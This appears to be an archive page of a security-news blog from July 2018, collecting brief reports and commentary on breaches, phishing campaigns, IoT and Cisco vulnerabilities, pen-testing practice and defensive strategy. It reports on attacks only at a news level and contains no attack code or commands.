Category Archives: security

Containers or Virtual Machines: Which is More Secure?

Are virtual machines (VM) more secure than containers? You may think you know the answer, but IBM Research has found containers can be as secure, or more secure, than VMs. From a report: James Bottomley, an IBM Research Distinguished Engineer and top Linux kernel developer, writes: "One of the biggest problems with the current debate about Container vs Hypervisor security is that no-one has actually developed a way of measuring security, so the debate is all in qualitative terms (hypervisors 'feel' more secure than containers because of the interface breadth) but no-one actually has done a quantitative comparison." To meet this need, Bottomley created Horizontal Attack Profile (HAP), designed to describe system security in a way that it can be objectively measured. Bottomley has discovered that "a Docker container with a well crafted seccomp profile (which blocks unexpected system calls) provides roughly equivalent security to a hypervisor."

Read more of this story at Slashdot.

Hackers attack Russian bank to steal $1m using an outdated router

By Waqas

Cybercriminals part of a notorious hacking group attacked the PIR Bank of Russia and stole $1m. The hacking was carried out after infiltrating the bank’s systems by compromising an old, outdated router. The router was installed at one of the regional branches of the bank. The money was stolen via the Automated Workstation Client (AWC) […]

This is a post from HackRead.com Read the original post: Hackers attack Russian bank to steal $1m using an outdated router

GoogleUserContent CDN Hosting Images Infected with Malware

By Waqas

The malware targets trusted Google sites. The metadata fields of images uploaded on trusted Content Delivery Network (CDN) of Google have been embedded with malicious code by hackers to compromise websites. This approach is indeed damaging because users never scan images for malware. The injected malware uses EXIF (Exchangeable Image File) format to hide the […]

This is a post from HackRead.com Read the original post: GoogleUserContent CDN Hosting Images Infected with Malware

Zero-Day Coverage Update – Week of July 16, 2018

One night this week, I came across one of my favorite movies Willy Wonka and the Chocolate Factory. The world had gone crazy after the reclusive Willy Wonka announces that he has hidden five golden tickets in chocolate Wonka Bars that promised a factory tour and a lifetime supply of chocolate. There’s a scene at a school where a teacher, Mr. Turkentine, decides to teach the kids about percentages and uses the Wonka Bars as an example. He asks one student how many Wonka Bars she bought and she replied, “About a hundred.” Mr. Turkentine tells her that there are ten hundreds in a thousand so that’s 10 percent. He asks a couple of other students and the percentages are easy to figure out. Then he asks Charlie Bucket, a poor paperboy, how many Wonka Bars he bought, and he says “Two.” Mr. Turkentine replied, “Two? What do you mean you only opened two? I can’t figure out the percentage for just two, so let’s just pretend you opened two hundred.”

While Mr. Turkentine has trouble with percentages, the Zero Day Initiative (ZDI) doesn’t. This month, Adobe had a bigger than normal patch for their Acrobat product, covering 107 CVEs. 68 of those CVEs came through the ZDI program! I don’t have any trouble figuring out that percentage – that’s 63.6% of the Acrobat vulnerabilities that came through ZDI. The “golden ticket” for Trend Micro customers isn’t a lifetime of chocolate, but preemptive protection against these bugs!

MindshaRE: An Introduction to PyKD

Earlier this week, ZDI researcher Abdul-Aziz Hariri posted a blog covering the topic of using PyKD to help automate debugging tasks and crash dump analysis using Python. His post is part of the MindshaRE blog series that provides insight on various reversing techniques to security researchers and reverse engineers. The blog demonstrates the installation and basic configuration of PyKD and goes on the show how it can be used to execute Python script from inside WinDBG. You can read the full blog here.

Adobe Security Update

This week’s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before July 10, 2018. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month’s security updates from Dustin Childs’ July 2018 Security Update Review from the Zero Day Initiative:

Bulletin # CVE # Digital Vaccine Filter Status
APSB18-21 CVE-2018-5009 32561
APSB18-21 CVE-2018-5010 32562
APSB18-21 CVE-2018-5011 32563
APSB18-21 CVE-2018-5012 32564
APSB18-21 CVE-2018-12799 32670
APSB18-21 CVE-2018-12803 32565
APSB18-21 CVE-2018-5014 32566
APSB18-21 CVE-2018-5015 32567
APSB18-21 CVE-2018-5016 32568
APSB18-21 CVE-2018-5017 32569
APSB18-21 CVE-2018-5018 32570
APSB18-21 CVE-2018-5019 32571
APSB18-21 CVE-2018-5020 32573
APSB18-21 CVE-2018-5021 32574
APSB18-21 CVE-2018-5022 32575
APSB18-21 CVE-2018-5023 32576
APSB18-21 CVE-2018-5024 32577
APSB18-21 CVE-2018-5025 32578
APSB18-21 CVE-2018-5026 32579
APSB18-21 CVE-2018-5027 32580
APSB18-21 CVE-2018-5028 32581
APSB18-21 CVE-2018-5029 32582
APSB18-21 CVE-2018-5030 32583
APSB18-21 CVE-2018-5031 32584
APSB18-21 CVE-2018-5032 32585
APSB18-21 CVE-2018-5033 32586
APSB18-21 CVE-2018-5034 32587
APSB18-21 CVE-2018-5035 32588
APSB18-21 CVE-2018-5036 32589
APSB18-21 CVE-2018-5037 32590
APSB18-21 CVE-2018-5038 32591
APSB18-21 CVE-2018-5039 32592
APSB18-21 CVE-2018-5040 32593
APSB18-21 CVE-2018-5041 32594
APSB18-21 CVE-2018-5042 32595
APSB18-21 CVE-2018-5043 32596
APSB18-21 CVE-2018-5044 32597
APSB18-21 CVE-2018-5045 32598
APSB18-21 CVE-2018-5046 32599
APSB18-21 CVE-2018-5047 32600
APSB18-21 CVE-2018-5048 32601
APSB18-21 CVE-2018-5049 32602
APSB18-21 CVE-2018-5050 32603
APSB18-21 CVE-2018-5051 32604
APSB18-21 CVE-2018-5052 32605
APSB18-21 CVE-2018-5053 32606
APSB18-21 CVE-2018-5054 32607
APSB18-21 CVE-2018-5055 32608
APSB18-21 CVE-2018-5056 32609
APSB18-21 CVE-2018-5057 32610
APSB18-21 CVE-2018-5058 32611
APSB18-21 CVE-2018-5059 32612
APSB18-21 CVE-2018-5060 32613
APSB18-21 CVE-2018-5061 32614
APSB18-21 CVE-2018-5062 32615
APSB18-21 CVE-2018-5063 32616
APSB18-21 CVE-2018-5064 32617
APSB18-21 CVE-2018-5065 32618
APSB18-21 CVE-2018-5066 32619
APSB18-21 CVE-2018-5067 32620
APSB18-21 CVE-2018-5068 32621
APSB18-21 CVE-2018-5069 32622
APSB18-21 CVE-2018-5070 32623
APSB18-21 CVE-2018-12754 32624
APSB18-21 CVE-2018-12755 32625
APSB18-21 CVE-2018-12756 32626
APSB18-21 CVE-2018-12757 32627
APSB18-21 CVE-2018-12758 32628
APSB18-21 CVE-2018-12760 32629
APSB18-21 CVE-2018-12761 32630
APSB18-21 CVE-2018-12762 32631
APSB18-21 CVE-2018-12763 32632
APSB18-21 CVE-2018-12764 32633
APSB18-21 CVE-2018-12765 32634
APSB18-21 CVE-2018-12766 32635
APSB18-21 CVE-2018-12767 32636
APSB18-21 CVE-2018-12768 32637
APSB18-21 CVE-2018-12770 32638
APSB18-21 CVE-2018-12771 32639
APSB18-21 CVE-2018-12772 32640
APSB18-21 CVE-2018-12773 32641
APSB18-21 CVE-2018-12774 32642
APSB18-21 CVE-2018-12776 32643
APSB18-21 CVE-2018-12777 32644
APSB18-21 CVE-2018-12779 32645
APSB18-21 CVE-2018-12780 32646
APSB18-21 CVE-2018-12781 32647
APSB18-21 CVE-2018-12782 32648
APSB18-21 CVE-2018-12783 32649
APSB18-21 CVE-2018-12784 Vendor Deemed Reproducibility or Exploitation Unlikely
APSB18-21 CVE-2018-12785 32650
APSB18-21 CVE-2018-12786 32651
APSB18-21 CVE-2018-12787 32652
APSB18-21 CVE-2018-12788 32653
APSB18-21 CVE-2018-12789 32654
APSB18-21 CVE-2018-12790 32655
APSB18-21 CVE-2018-12791 32656
APSB18-21 CVE-2018-12792 32657
APSB18-21 CVE-2018-12802 Vendor Deemed Reproducibility or Exploitation Unlikely
APSB18-21 CVE-2018-12793 32658
APSB18-21 CVE-2018-12794 32659
APSB18-21 CVE-2018-12795 32660
APSB18-21 CVE-2018-12796 32661
APSB18-21 CVE-2018-12797 32662
APSB18-21 CVE-2018-12798 32663
APSB18-24 CVE-2018-5007 32559
APSB18-24 CVE-2018-5008 32560

 

Zero-Day Filters

There are no new zero-day filters in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of published advisories and upcoming advisories on the Zero Day Initiative website. You can also follow the Zero Day Initiative on Twitter @thezdi and on their blog.

Missed Last Week’s News?

Catch up on last week’s news in my weekly recap.

The post Zero-Day Coverage Update – Week of July 16, 2018 appeared first on .

What Defines a Cyber Insurgency?

“A fool pulls the leaves. A brute chops the trunk. A sage digs the roots.” – Pierce Brown

 

The western world is currently grappling with a cyber insurgency.  The widespread adoption of the “kill-chain” coupled with the use of memory resident malware has fueled the cyber-attack wild fire.  The security architectures mandated by regulators and standard bodies are collapsing. History does repeat itself. One should study the evolution of insurgencies to better grasp the nature of cybersecurity in 2018.

 

In the Red Rising Trilogy, Pierce Brown introduces a military tactic that could only work in a world where humans live on multiple planets and asteroids. We won’t spoil the book completely (go read the series, it’s awesome) but for the purposes of this blog an Iron Rain can be defined as a mass invasion tactic. Enemy fleets gather outside the atmosphere of a planet and use pods or other drop ships to launch an unbelievably overwhelming military force on a planets populace.

 

It’s overwhelming. It’s instant and if you miss-react you are doomed to fall to the Iron Rain. Just like with cyberattacks. It must be stated that attacks are not stand alone and in many cases they are simply part of a larger “Iron Rain” effort. If you follow the strategy behind most nation state attacks you quickly start to realise that these efforts resemble insurgency tactics more than they do standard military ones.

 

What defines a cyber insurgency?

 

The Department of Defense Joint Publication 1-02, Department of Defense Dictionary of Military and Associated Terms (Washington, DC: U.S. Government Printing Office [GPO], 12 April 2001), defines an insurgency as “an organised movement aimed at the overthrow of a constituted government through the use of subversion and armed conflict.”

 

In cyber terms “an organised movement aimed at the disruption of cyber systems and through subversion and armed cyber conflict.”

 

The goals of the cyber insurgency may vary however the following conditions must exist for a cyber insurgency:

 

  1. You must have a common entity or authority against whom your actions are directed.
  2. You must have the tools of cyber insurrections themselves: and the systems to launch attacks against the entities.
  3. The cyber insurgents must be willing to use cyber force against their targets. This element distinguishes a cyber insurrection from intelligence gathering purposes.

 

As a former U.S. Marine we were taught to think differently. We were taught to think like the enemy and take it to them when needed. The Marines have a history of doing more with way less we take pride in it. Just like InfoSec teams. Over the last few years it has become apparent that our enemies are emboldened and becoming more aggressive. We must shift thinking and tactics to begin to turn the tide. Just like every battlefield Marine. Intel changes, things move fast and people’s lives are at risk.

 

It is fundamental that cybersecurity professionals take a page from the annals of irregular or low intensity warfare to better understand how to combat this threat.  This article is meant to begin an open discussion on how we as defenders can best modernise our strategies of cybersecurity. Much of the strategic tenants below are derived from The Marine Corps Counter Insurgency Manual or FM 3-24 MCWP 3-33.5 and adapted to the world of cyber.

 

To effectively discuss cyber insurgencies we must discuss the idea of irregular warfare.

 

Low intensity warfare or irregular warfare is a violent struggle among state and non-state actors for legitimacy and influence over the relevant populations. Irregular warfare favours indirect approaches, though it may employ the full range of evasion and other capacities in order to erode an adversary’s prevention, detection, and response capabilities.

 

When counter insurgents attempt to defeat an insurgency, they perform a range of diverse methods. Leaders must effectively arrange these diverse methods in time and cyberspace to accomplish strategic objectives. The various combinations of these methods with different levels of resourcing provide each team with a wide range of strategic options to defeat an insurgency.

 

“Effective cyber counterinsurgency operations require an understanding of not only available cyber security capabilities but also the capabilities of the adversary.”

 

The tasks counter insurgents perform in countering an insurgency are not unique. It is the organisation of these tasks in time and space that is unique. For example, financial organisations may employ strategy to align and shape efforts, resources, and tasks to support strategic goals and prepare for specific attacks on their institution. In support of this goal, good strategies would normally emphasize security cooperation activities, building partner capacity and sharing threat intelligence.

 

Business leaders and security leaders must have a dialogue to decide the optimal strategy to meet the security needs of the organisation the team is supporting. Different capabilities provide different choices that offer different costs and risks.

 

Unified action is essential for all types of involvement in any counterinsurgency. Unified action is the synchronisation, coordination, and/or integration of the activities of entities with cyber security operations to achieve unity of effort. Your organisation must have a unified approach to cyber operations.

 

We must begin to think collectively as an organisation. The time for siloed decisions is over. The time for unified action is here and we must unify our strategies to combat the ongoing cyber insurgency. On 19th July, we will be releasing the Cb Quarterly Incident Response Threat Report (QIRTR) where we survey dozens of our IR and MDR partners per ground truth in cyber.  The results will be interest to you and your organisation. Stay tuned!

The post What Defines a Cyber Insurgency? appeared first on IT SECURITY GURU.

Amazon Prime Day: 60% increase in cloud transactions impact business apps

Amazon Prime Day took place this week, with the retailer claiming that the first 10 hours grew even faster than the first 10 hours on the same day in 2017, exceeding the £766m ($1bn) in sales globally. According to reports, spending jumped 89 percent in the first 12 hours of the event compared to the same period last year.

Zscaler released its own data, which reveals the number of Amazon transactions taking place in the Zscaler cloud from Monday 16th July at 1am BST to end of the day Tuesday 17th July. The data revealed there were 60 percent more cloud transactions to Amazon.com on Prime Day than seen in the Zscaler cloud on a typical day. You can see the network traffic spikes in the graph attached.

Matt Piercy, vice president and general manager EMEA at Zscaler, commented on the results, noting that as businesses increasingly move their infrastructure to the cloud, these daytime spikes have a reduced impact on business applications:

“Our data indicates that, during Amazon Prime Day, Amazon traffic in the Zscaler cloud rose considerably during the working day, with tens of millions more people visiting Amazon.com than usual over the two days. The growing popularity of retail events like Amazon Prime Day means people are likely going to find ways of shopping while at work, which can have a significant impact on network bandwidth – something that has traditionally posed a problem for the IT team. Indeed, as more businesses adopt BYOD policies, we’re finding a growing number of personal as well as corporate devices connected to the WLAN. Online shopping to this extent can hamper the performance of business critical applications, such as file sharing, backup, and Office 365.

“The truth is, however, that the modern enterprise will incur network spikes, planned or not, that will put a strain on network resources. Whether it’s Amazon Prime Day or another popular sale such as Black Friday/Cyber Monday, unexpected demand for a product, or even an oversubscribed employee webcast, network spikes are no longer an anomaly – they’ll happen. The good news is that we are on the cusp of a new era for business. More and more enterprises are moving their infrastructure to the cloud, which offers a level of elasticity that businesses have not previously experienced. By embracing digital transformation, enterprises no longer need to buy new appliances, install virtual machines or block major retail events like Amazon Prime to accommodate spiked traffic.”

The post Amazon Prime Day: 60% increase in cloud transactions impact business apps appeared first on IT SECURITY GURU.

Vulnerable IoT Vacuums, DVRs Put Homes at Risk

The internet of things (IoT) has seen a string of vulnerabilities across multiple devices, the latest of which are new vulnerabilities in Dongguan Diqee 360 robotic vacuum cleaners, which could allow cybercriminals to eavesdrop, perform video surveillance and steal private data, according Positive Technologies.

View Full Story

ORIGINAL SOURCE: Infosecurity Magazine

The post Vulnerable IoT Vacuums, DVRs Put Homes at Risk appeared first on IT SECURITY GURU.

Pen testing: why do you need it, and five steps to doing it right

Penetration testing can contribute a lot to an organisation’s security by helping to identify potential weaknesses. But for it to be truly valuable, it needs to happen in the context of the business.

I asked Brian Honan, CEO of BH Consulting, to explain the value of pen testing and when it’s needed. “A pen test is a technical assessment of the vulnerabilities of a server, but it needs the business to tell you which server is most important. Pen testing without context, without proper scoping and without regular re-testing has little value,” he said.

Steps to do pen testing right

Some organisations feel they need to conduct a pen test because they have to comply with regulations like PCI, or to satisfy auditors, or because the board has asked for it. They’re often the worst places to start. To do it right, a business should:

  • Dedicate appropriate budget and time to the test
  • Carry out a proper scoping exercise first
  • Set proper engagement parameters
  • Run it regularly – preferably quarterly and more than just once a year
  • Use pen testing to check new systems before they go into production.

Absent those key elements, the test will not fail as such, but the approach from the start is just to tick a box. That’s why a one-off test will tell you little about how secure a system is. “A pen test is only a point-in-time assessment of a particular system, and there are ways to game the test. We have done pen tests where a client told us ‘these systems are out of scope’ – but they would be in scope for a criminal,” said Brian.

Prioritising business risks

The reason for running a pen test before systems go into production is that criminals may target them once they are live. It’s especially important if the new system will be critical to the business. “The value of doing a good pen test within context of the business, is that it will identify vulnerabilities and issues that the organisation can prioritise based on the business impact,” said Brian.

Pen testing, though valuable, is only one element of good security. “Unfortunately, many people think that if they run a pen test against their website, and it finds nothing, therefore their security is OK,” Brian said. “Just because you have car insurance doesn’t mean you won’t have an accident. There are many other factors that come into play: road conditions, other drivers on the road, confidence and experience of the driver.”

Brian warned against the risk of using pen testing as a replacement for a comprehensive security programme. If organisations have limited budget, spending it on a pen test arguably won’t make them any more secure. “Just doing it once a year to keep an auditor happy is not the best approach. It’s not a replacement for a good security programme,” he said.

The post Pen testing: why do you need it, and five steps to doing it right appeared first on BH Consulting.

Microsoft detected Russian phishing attacks on three 2018 campaigns

Russia is still launching cyberattacks against the US, a Microsoft exec has revealed, contradicting what the President claimed just a few days ago. According to Microsoft VP for customer security and trust Tom Burt (shown above second from right, with his hand raised), his team discovered a spear-phishing campaign targeting three candidates running for office in 2018. Burt announced his team's findings while speaking on a panel at the Aspen Security Forum, where he also revealed that they traced the new campaign to a group believed to be operated by the GRU, Russia's largest foreign intelligence agency. In other words, those three candidates are being targeted by the same organization that infiltrated the DNC and Hillary Clinton's Presidential campaign in 2016.

Source: Buzzfeed News, Aspen Institute (YouTube)

Chinese Hackers Targeted IoT During Trump-Putin Summit

Zorro shares a report from Defense One: Four days before U.S. and Russian leaders met in Helsinki, hackers from China launched a wave of brute-force attacks on internet-connected devices in Finland, seeking to gain control of gear that could collect audio or visual intelligence, a new report says. Traffic aimed at remote command-and-control features for Finnish internet-connected devices began to spike July 12, according to a July 19 report by Seattle-based cybersecurity company F5. China generally originates the largest chunk of such attacks; in May, Chinese attacks accounted for 29 percent of the total. But as attacks began to spike on July 12, China's share rose to 34 percent, the report said. Attacks jumped 2,800 percent. The China-based hackers' primary target was SSH (or Secure Shell) Port 22 -- not a physical destination but a specific set of instructions for routing a message to the right destination when the message hits the server. "SSH brute force attacks are commonly used to exploit systems and [internet of things, or IOT] devices online," the report says. "SSH is often used by IoT devices for 'secure' remote administration." The report notes that attack traffic came from the U.S., France, and Italy as well, but the U.S. and French traffic kept with its averages. "Russian attack traffic dropped considerably from third, its usual spot, to fifth," reports Defense One. "German attack traffic jumped."

Read more of this story at Slashdot.

Microsoft Reveals First Known Midterm Campaign Hacking Attempts

An anonymous reader shares a report: Microsoft detected and helped block hacking attempts against three congressional candidates this year, a company executive said Thursday, marking the first known example of cyber interference in the midterm elections. "Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks," said Tom Burt, Microsoft's vice president for security and trust, at the Aspen Security Forum. "And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections." Burt declined to name the targets but said they were "people who, because of their positions, might have been interesting targets from an espionage standpoint as well as an election disruption standpoint." Microsoft took down the fake domain and worked with the federal government to block the phishing messages.

Read more of this story at Slashdot.

Hackers Breach Russian Bank and Steal $1 Million Due To Outdated Router

Catalin Cimpanu, reporting for BleepingComputer: A notorious hacker group known as MoneyTaker has stolen roughly $1 million from a Russian bank after breaching its network via an outdated router. The victim of the hack is PIR Bank, which lost at least $920,000 in money it had stored in a corresponding account at the Bank of Russia. Group-IB, a Russian cyber-security firm that was called in to investigate the incident, says that after studying infected workstations and servers at PIR Bank, they collected "irrefutable digital evidence implicating MoneyTaker in the theft." Group-IB are experts in MoneyTaker tactics because they unmasked the group's existence and operations last December when they published a report on their past attacks.

Read more of this story at Slashdot.

Cyber Security Incidents: Insider Threat falls in UK (to 65%) and Germany (to 75%) post GDPR, but US risk increases (to 80%)

New research by data security company, Clearswift, has shown that year on year cyber security incidents from those within the organisation, as a percentage of all incidents, have fallen in the UK and Germany, two countries currently now under the ruling of GDPR. However, in the United States, a country outside of the direct jurisdiction, threats are on the rise.

 

The research surveyed 400 senior IT decision makers in organisations of more than 1,000 employees across the UK, Germany, and the US. The data has revealed that when looking at the true insider threat, which takes into account inadvertent and malicious threats from the extended enterprise – employees, customers, suppliers, and ex-employees – this number sits at 65% in the UK, down from 73% in 2017. Similarly, senior IT decision makers in Germany also saw a drop to 75%, down from 80% the previous year. US respondents actually saw a rise in the insider threat up to 80%, a number rising from 72% in 2017.

 

Direct threats from an employee within the business – inadvertent or malicious – now make up 38%, of incidents. This has halted the rising threat evident in 2017 and 2015 showing 42% and 39% respectively. Threats from ex-employees account for 13% of all cyber security incidents, highlighting a clear need for better processes when employees part ways.

 

“Although there’s a slight decrease in numbers in the EMEA region, the results once again highlight the insider threat as being the chief source of cyber security incidents. Three quarters of incidents are still coming from within the business and its extended enterprise, far greater than the threat from external hackers. Businesses need to shift the focus inwards”, said Dr Guy Bunker, SVP Products at Clearswift.

 

“I think at the very least what GDPR has done is ensure firms have a better view of where critical data sits within their business and highlighted to employees that data security is an issue that is now of critical importance, which may be why we’ve seen a drop in the insider threat across EU countries. If a firm understands where the critical information within the business is held and how it is flowing in and out of the network, then it is best placed to manage and protect it from the multitude of threat vectors we’re seeing today.”

 

Although internal threats pose the biggest threat to most organisations, employers believe that the majority (62%) of incidents are accidental or inadvertent rather than deliberate in intent; a number that is slightly down on 2017 (65%).

 

The insider threat was slightly less for companies with over 3,000 employees (36%), as opposed to those with between 1,000 – 3,000 employees. This is a possible indication of more robust internal processes and checkpoints at larger businesses.

 

Bunker added, “Organisations need to have a process for tracking the flow of information in the business and have a clear view on who is accessing it and when. Businesses need to also ensure that employees ‘buy into’ the idea that data security is now a critical issue for the business. Educating them on the value of data, on different forms of data, what is shareable and what’s not, is crucial to a successful cyber security strategy.

 

“Having said that, mistakes can still happen and technology can act as both the first and last line of defence. In particular, Adaptive Data Loss Prevention solutions can automatically remove sensitive data and malicious content as it passes through a company network.”

 

The post Cyber Security Incidents: Insider Threat falls in UK (to 65%) and Germany (to 75%) post GDPR, but US risk increases (to 80%) appeared first on IT SECURITY GURU.

6 ways you are sabotaging your cyber defences

If we asked any of the IT departments that we deal on a daily basis about their current priorities, they would all unfailingly say that protecting their company against cyber attacks and data breaches is top of the list – particularly now that GDPR is finally in force.

 

However, despite high awareness of the risks in terms of reputational damage, regulatory penalties and commercial losses, it’s evident that a surprisingly high proportion of companies – from SMEs to global corporations – are burying their heads in the sand when it comes to shoring up their cyber defences.

 

Here are 6 ways that we see companies failing to minimise their chances of suffering an information breach.

 

  • Neglecting security until it’s too late

This is a far more common story than you would imagine. The reason? Until they’ve been targeted by cyber criminals, many companies still won’t recognise the very real likelihood – and potentially devastating impact – of a security breach. They think they can get away with not spending money until a crisis occurs.

 

Firstly, if there was a system to rate the cyber security threat at an individual company level, it would be severe – an attack is highly likely. Nearly half of all businesses in the UK were hit by a cyber attack in the last 12 months, with 38 new ransomware attacks being reported every day. Secondly, as we tell clients – prepare for disaster, recover faster!

 

  • Thinking you can prevent breaches

In the security world, preparation doesn’t mean prevention. We are all engaged in a constant battle with ever-more sophisticated cyber criminals, and attacks are going to happen. Your security strategy should focus on defence but also response. Early identification and containment is absolutely vital. Once an attacker has infiltrated a laptop or email system, can they then roam freely around your entire network? Think of them like physical intruders, who will try any route. You’ve designed the building so install fire doors to slow them down!

 

  • Not defining your business-critical data assets

Many organisations, especially those who have been hit by a breach and are in panic mode, haven’t covered off one of the basics: defining information assets and ranking them by priority in order to conduct a proper risk assessment. In essence, this crucial step is about understanding what you hold, its importance to the business and specific security risks. Only then can you make informed decisions and put the right measures in place.

 

  • Not testing defences appropriately 

It’s well-recognised that companies should conduct an independent review of their information security posture every 12 months. But we find that a security testing strategy needs to be more flexible than this. A rigid annual review can expose you to vulnerabilities if you’ve installed new software or servers, for instance. Ideally, a pen test should be carried out after any significant change to your IT infrastructure.

 

  • Over-relying on tech

Security is a process, not a product – and to mitigate the risks associated with social engineering, this is a fundamental lesson to take to heart. Overlooking the human angle will cause even the most advanced technical barriers to crumble. Train your staff, refresh that training, embed it into HR procedures and regular team meetings, put policies and procedures in place – and check that they are followed. Clients often tell us that they have the tightest security policies known to man – yet nobody is monitoring how well staff understand and adhere to them. Remember that the workforce is your frontline defence.

 

  • Resistance to change

Is the IT or senior management team open to challenging existing ways of working, such as by bringing in external security advisors? It’s important to be honest with yourself about the capacity and limitations of your in-house resources. There is no room for being defensive or territorial in IT security – in fact those attitudes could lead to very serious problems, particularly under the GDPR which makes data protection everybody’s business. Risk assessments and decision-making needs to be objective – and sometimes that’s easier to hear from a third-party.

 

Of course, many of these fundamental processes are a requirement for ISO 27001-certified firms, but even then we find that there is often an emphasis on box-ticking and meeting initial standards, which tend to lapse over time. An effective information security framework needs to be continually refreshed and honed – with a security mindset embedded into your company’s culture at every level.

The post 6 ways you are sabotaging your cyber defences appeared first on IT SECURITY GURU.

Will this biz be poutine up the cash? Hackers demand dosh to not leak stolen patient records

Hackers say they will leak patient and employee records stolen from a Canadian healthcare provider unless they are paid off. The records include medical histories and contact information for tens of thousands of home-care patients in Ontario, Canada, and belong to CarePartners. The biz, which provides home medical care services on behalf of the Ontario government, admitted last month that it had been hacked, and its documents copied.

View Full Story

ORIGINAL SOURCE: The Register

The post Will this biz be poutine up the cash? Hackers demand dosh to not leak stolen patient records appeared first on IT SECURITY GURU.

Retail cyber security spending ineffective as breaches rise

Half of US retailers experienced a data breach in the past year, up from 19% the year before, according to the retail edition of the 2018 Thales data threat report. This increase drove US retail to the second most breached sector in the US after the federal government, putting it ahead of healthcare and financial services. The increased number of data breaches in the sector means that three-quarters of US retailers polled have experienced at least one data breach, up from 52% a year ago.

View Full Story

ORIGINAL SOURCE: Computer Weekly

The post Retail cyber security spending ineffective as breaches rise appeared first on IT SECURITY GURU.

UK School Software Bug Assigns Kids to the Wrong Parents

IT firm Capita has come clean about a bug in the software it supplies to UK schools that has been mismatching kids with the wrong families since December 2017. According to a message sent to school administrators this week, the bug affects the Schools Information Management System (SIMS), a type of software used by UK schools to keep track of students, their grades, classes, and parent information.

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post UK School Software Bug Assigns Kids to the Wrong Parents appeared first on IT SECURITY GURU.

Brit watchdog fines child sex abuse inquiry £200k over mass email blunder

The UK’s data watchdog today issued the Independent Inquiry into Child Sexual Abuse (IICSA) a £200,000 penalty after it sent a bulk email to participants that identified possible victims of historical crimes. The Information Commissioner’s Office (ICO) said IICSA – set up in 2014 to probe the degree to which institutions in England and Wales failed in their duty to protect young people from molestation – had breached the Data Protection Act (DPA) 1998 by not keeping confidential and sensitive personal data secure.

View Full Story

ORIGINAL SOURCE: The Register

The post Brit watchdog fines child sex abuse inquiry £200k over mass email blunder appeared first on IT SECURITY GURU.

A Short Guide to Cyber Security for Small Businesses

Cyber security is an increasingly important topic for any small business to tackle, yet it remains a mystery to many. Unpicking the complexity of this issue might seem daunting, but this brief guide will lay the groundwork. For a fuller picture, check out this article from Fidus Information Security.  ultimate cyber security guide for business.

Main Security Threats to Consider

There are lots of ever-evolving threats posed by cybercriminals to small businesses, but the main ones include phishing, identity theft, DDoS (distributed denial of service) attacks and malware infections.

Phishing comes in several forms, including fake sites designed to trick visitors into entering sensitive data or downloading dangerous code. It can also factor in phoney emails and other fraudulent communications with similar aims in mind.

ID theft will allow crooks to create accounts, set up credit cards and make purchases using the identity of the victimised individual or organisation.

DDoS involves assaulting a business’ website with traffic from a network of compromised devices, taking it offline and keeping genuine users out of the picture.

Malware and viruses can have a range of implications and uses, from holding a business to ransom by locking down its mission-critical data to stealing information and passing it on to malicious third parties.

There are plenty of other cyber security obstacles to overcome, but getting to grips with these basic concepts is sensible for small business owners.

Why Am I A Target?

Aside from the small handful of cybercriminals who simply want to cause indiscriminate havoc with their actions, most are motivated by money. And the best way to earn a living if you have underhanded computer skills is to steal and manipulate data in the hope of being able to sell it or profit from its subversion.

Data is the currency of the digital world and stolen information can be sold in large volumes to the highest bidder on the black market. Businesses are typically responsible for significant stores of sensitive information, so they are seen as the perfect target by hackers.

What Are The Consequences of Ignoring Cyber Threats?

With a triumvirate of troubling outcomes from being hit by a cyberattack, small businesses cannot afford to ignore the need to implement a suitable security policy.

Firstly your reputation will suffer a blow if you become one of the 40 per cent of British businesses hit by an attack each year.

Secondly, the loss of custom that comes in the wake of a breach will bring many fledgeling firms to their knees, with financial woes knocking out almost two-thirds of small businesses that have been successfully attacked.

Thirdly the legal and regulatory ramifications can be significant, especially in the wake of the GDPR and the steeper fines that firms face if they mishandle customer data. Being sued by individuals and other organisations is also a likelihood, which puts yet more pressure on impacted businesses.

How to Bolster Cyber Security Measures

The first thing to realise about cyber threats is that they can only be faced if everyone involved in a small business, from the latest hires to the members of the board, is aware of these risks and committed to combating them.

Next, you will need to lay down a suitable plan to protect your internal network, simplify it where possible and ensure that it is as robust and resilient in the face of the main cyber threats as possible.

You should also get a handle on the kind of data you are holding, whether it complies with GDPR and whether it is properly secured with encryption. Storing information in a cloud-powered platform can be convenient if you want to avoid the expense of opting for an on-site solution.

Keeping tabs on network traffic, training staff and monitoring internal threats posed by disgruntled employees will all be necessary if you want to have complete peace of mind about the state of your cybersecurity.

Ultimately it is crucial to never become complacent, even if you have put plenty of security measures in place. Cyber threats are always changing and you need to be ready to respond to them, whether you run a small business or a multinational corporation.

 

The post A Short Guide to Cyber Security for Small Businesses appeared first on IT SECURITY GURU.

Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.

The tech giant has reported customers four critical vulnerabilities affecting the Policy Suite.

The flaws tracked as CVE-2018-0374CVE-2018-0375CVE-2018-0376, and CVE-2018-0377 have been discovered during internal testing.

Two of these flaws could be exploited by a remote unauthenticated attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

The access to the Policy Builder interface could allow an attacker to change to existing repositories and create new ones, while the access to the OSGi interface could allow an attacker to access or change any file accessible by the OSGi process.

An unauthenticated attacker could also allow an attacker to modify any data contained in the Policy Builder database.

“A vulnerability in the Policy Builder database of Cisco Policy Suite could allow an unauthenticated, remote attacker to connect directly to the Policy Builder database.” reads the security advisory published by Cisco.

“The vulnerability is due to a lack of authentication. An attacker could exploit this vulnerability by connecting directly to the Policy Builder database. A successful exploit could allow the attacker to access and change any data in the Policy Builder database.”

CISCO Policy Suite

Cisco also warned of the presence of the Cluster Manager in Policy Suite of a root account with default and static credentials. A remote attacker can exploit the vulnerabilities to access to the account and execute arbitrary commands with root privileges.

Cisco also warned of the presence of seven flaws in the SD-WAN solution, one of them affects the Zero Touch Provisioning service and could be exploited by an unauthenticated attacker to trigger denial-of-service (DoS) condition.

Other SD-WAN vulnerabilities could allow an authenticated attacker to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges.

